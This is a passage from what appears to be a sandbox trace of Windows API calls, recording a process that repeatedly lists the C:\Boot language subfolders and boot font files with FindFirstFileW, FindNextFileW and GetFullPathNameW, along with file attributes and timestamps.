ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0154.561] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.562] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0154.562] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0154.562] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.563] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.563] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.563] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.563] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.563] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0154.563] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0154.563] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.563] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.564] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.564] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.564] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.564] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0154.564] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0154.564] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.564] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.565] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.565] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.565] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.565] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0154.565] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0154.565] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.565] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.565] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.566] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.566] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.566] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0154.566] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0154.566] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.567] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.567] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.567] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.567] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.567] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0154.567] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0154.567] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.568] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.568] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.568] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.568] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.568] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0154.568] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0154.568] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.570] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.570] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.570] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.570] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.570] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0154.570] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0154.570] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.571] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.571] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.571] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.571] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.571] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", 